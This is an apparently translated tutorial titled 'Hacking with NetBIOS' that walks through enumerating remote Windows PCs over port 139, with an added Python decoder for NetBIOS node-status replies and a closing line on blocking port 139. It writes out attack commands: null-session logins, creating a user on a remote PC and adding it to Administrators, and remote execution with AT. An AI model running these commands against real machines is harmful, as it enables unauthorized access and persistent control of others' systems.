Hacking with NetBIOS
This page shows different ways to get as much information as possible from a remote PC using NetBIOS.
The first thing is to check that the computer we want to connect to has the NetBIOS port open, which is port 139. This can be done from the MS-DOS console with the command: telnet ADDRESS 139. If it connects, the port is open; if not, look for another PC.
The second most important thing is to have the NetBIOS table, which tells us which services the remote computer is running; we will check it against the results obtained with the subsequent commands.
In the Type column, U is a unique name and G is a group name.

| Name | Suffix | Type | Service |
|---|---|---|---|
| <computername> | 00 | U | Workstation Service |
| <computername> | 01 | U | Messenger Service |
| <_MSBROWSE_> | 01 | G | Master Browser |
| <computername> | 03 | U | Messenger Service |
| <computername> | 06 | U | RAS Server Service |
| <computername> | 1F | U | NetDDE Service |
| <computername> | 20 | U | File Server Service |
| <computername> | 21 | U | RAS Client Service |
| <computername> | 22 | U | Exchange Interchange |
| <computername> | 23 | U | Exchange Store |
| <computername> | 24 | U | Exchange Directory |
| <computername> | 30 | U | Modem Sharing Server Service |
| <computername> | 31 | U | Modem Sharing Client Service |
| <computername> | 43 | U | SMS Client Remote Control |
| <computername> | 44 | U | SMS Admin Remote Control Tool |
| <computername> | 45 | U | SMS Client Remote Chat |
| <computername> | 46 | U | SMS Client Remote Transfer |
| <computername> | 4C | U | DEC Pathworks TCPIP Service |
| <computername> | 52 | U | DEC Pathworks TCPIP Service |
| <computername> | 87 | U | Exchange MTA |
| <computername> | 6A | U | Exchange IMC |
| <computername> | BE | U | Network Monitor Agent |
| <computername> | BF | U | Network Monitor Apps |
| <username> | 03 | U | Messenger Service |
| <domain> | 00 | G | Domain Name |
| <domain> | 1B | U | Domain Master Browser |
| <domain> | 1C | G | Domain Controllers |
| <domain> | 1D | U | Master Browser |
| <domain> | 1E | G | Browser Service Elections |
| <INet~Services> | 1C | G | Internet Information Server |
| <IS~Computer_name> | 00 | U | Internet Information Server |
With this MS-DOS command we can find out which services the remote machine is running: nbtstat -A ADDRESS or nbtstat -a PCNAME. Apart from this, it also gives us the MAC address, in case we are interested.
Running nbtstat against an IP or PC name gives us those results; comparing them against the NetBIOS table yields juicy data such as the user, the domain it belongs to… and if it were a domain controller we would see the services it runs.
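To show what nbtstat is actually decoding, here is an added Python example (not the page author's code) that parses a raw NetBIOS node-status reply into the service table above; the reply bytes are constructed, reusing only the BUJARRA01 name and MAC that appear in the nbtscan sample further down.

```python
"""Decode a NetBIOS node-status (NBSTAT) reply, the data behind `nbtstat -A`,
into the service table above. Added example for this page, not the author's
code; the reply bytes are constructed, not captured from a real host."""
import struct

# (suffix, type) -> service, from the NetBIOS table above (U = unique, G = group)
SERVICES = {
    (0x00, "U"): "Workstation Service", (0x03, "U"): "Messenger Service",
    (0x20, "U"): "File Server Service", (0x00, "G"): "Domain Name",
    (0x1B, "U"): "Domain Master Browser", (0x1C, "G"): "Domain Controllers",
    (0x1D, "U"): "Master Browser", (0x1E, "G"): "Browser Service Elections",
    (0x01, "G"): "Master Browser",  # the <_MSBROWSE_> entry
}

def decode_node_status(rdata: bytes):
    """RDATA layout (RFC 1002): NUM_NAMES, then 18-byte entries of
    15-char space-padded name + suffix byte + 2 flag bytes (bit 15 = group),
    then the 6-byte unit id, which Windows fills with the MAC address."""
    num_names, pos, names = rdata[0], 1, []
    for _ in range(num_names):
        raw, suffix = rdata[pos:pos + 15], rdata[pos + 15]
        (flags,) = struct.unpack(">H", rdata[pos + 16:pos + 18])
        kind = "G" if flags & 0x8000 else "U"
        name = raw.rstrip(b" ").decode("ascii", "replace")
        names.append((name, suffix, kind, SERVICES.get((suffix, kind), "unknown")))
        pos += 18
    mac = "-".join(f"{b:02X}" for b in rdata[pos:pos + 6])
    return names, mac

def is_domain_controller(names) -> bool:
    """A host registering <domain>[1C] as a group name is a domain controller."""
    return any(suffix == 0x1C and kind == "G" for _, suffix, kind, _ in names)

def _entry(name: str, suffix: int, group: bool) -> bytes:
    flags = (0x8000 if group else 0) | 0x0400          # 0x0400 = name is ACTIVE
    return name.encode("ascii").ljust(15, b" ") + bytes([suffix]) + struct.pack(">H", flags)

# Constructed reply for a DC named BUJARRA01 in domain BUJARRA (name and MAC taken
# from the nbtscan sample on this page; the packet itself is made up).
SAMPLE_RDATA = (bytes([5])
                + _entry("BUJARRA01", 0x00, False) + _entry("BUJARRA", 0x00, True)
                + _entry("BUJARRA01", 0x20, False) + _entry("BUJARRA", 0x1C, True)
                + _entry("BUJARRA", 0x1B, False) + bytes.fromhex("00E07D7811E6"))

if __name__ == "__main__":
    found, mac = decode_node_status(SAMPLE_RDATA)
    for name, suffix, kind, service in found:
        print(f"{name:<15} <{suffix:02X}> {kind}  {service}")
    print("MAC:", mac, "| domain controller:", is_domain_controller(found))
```

The same decoder applied to your own hosts' replies tells you exactly which names (and therefore which services) they advertise on port 137, which is what you want to review before deciding whether File and Printer Sharing needs to stay on.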
To establish what is called a null session, we have to run this command: net use \\IPADDRESS\IPC$ "" /u:"" . What this command actually does is authenticate to the remote PC as the Anonymous user.
To authenticate to a remote computer with a specific user: net use \\ADDRESS /u:USERNAME PASSWORD, or net use \\ADDRESS\IPC$ /u:USERNAME PASSWORD, or net use \\ADDRESS\RESOURCE /u:USERNAME PASSWORD… Once authenticated to the remote host, to view its shared folders you can run net view \\ADDRESS and we will see the content in MS-DOS; but you can also go to Start > Run and type \\IPADDRESS or \\IPADDRESS\resource, and it will show you the content in a Windows Explorer window.
View Remote Time: net time ADDRESS
View Available Domains: Net View /Domain
View computers in a specific domain: Net View /Domain:BUJARRA
View the users on a computer: Net User
View a user's details: Net User username
Create a user: net user username password /ADD (Ideal for creating a user on a remote PC with the AT command)
Delete a user: net user username /DELETE
View groups on a PC: Net Group
Put a user in a group: net group GROUPNAME USERNAME /ADD (Ideal for putting the user we have created remotely on a PC into the Administrators group)
Remove a user from a group: Net Group NameGroup Username /DELETE
The AT command, to run things remotely. With the command at \\IPADDRESS we will see the scheduled tasks that the computer has, and with the command at \\IPADDRESS 21:30 /INTERACTIVE "MS-DOS command to run on the remote PC" we schedule one. In that command, 21:30 is the time at which I have set the quoted MS-DOS command to be executed, so you can put any time, but first check what time the remote computer has!
The MS Windows Resource Kit tool nltest (nltest.rar) displays the domain controllers for a particular domain, for example:
C:\>nltest /dclist:bujarra.com
List of DCs in Domain bujarra.com
bujarra01
Also interesting is the program nbtscan, which does an 'nbtstat' of an entire network at an impressive speed. Example:
C:\>nbtscan 192.168.0.0/24
 Doing NBT name scan for addresses from 192.168.0.0/24
 IP address     NetBIOS Name  Server    User      MAC address
 ------------------------------------------------------------------
 192.168.0.0    Sendto failed: Cannot assign requested address
 192.168.0.1    BUJARRA01     <server>  <unknown> 00-E0-7D-78-11-E6
 192.168.0.13   MARIA         <server>  MARIA     00-E0-7D-76-5A-2B
 192.168.0.55   VICETOPC      <server>  VICETO    00-00-f8-30-fa-23
 192.168.0.100  Recvfrom failed: Connection reset by peer
To protect ourselves from this type of attack we must either close port 139 on the router, enable the firewall in XP, or remove the File and Printer Sharing for Microsoft Networks service (on any Microsoft OS).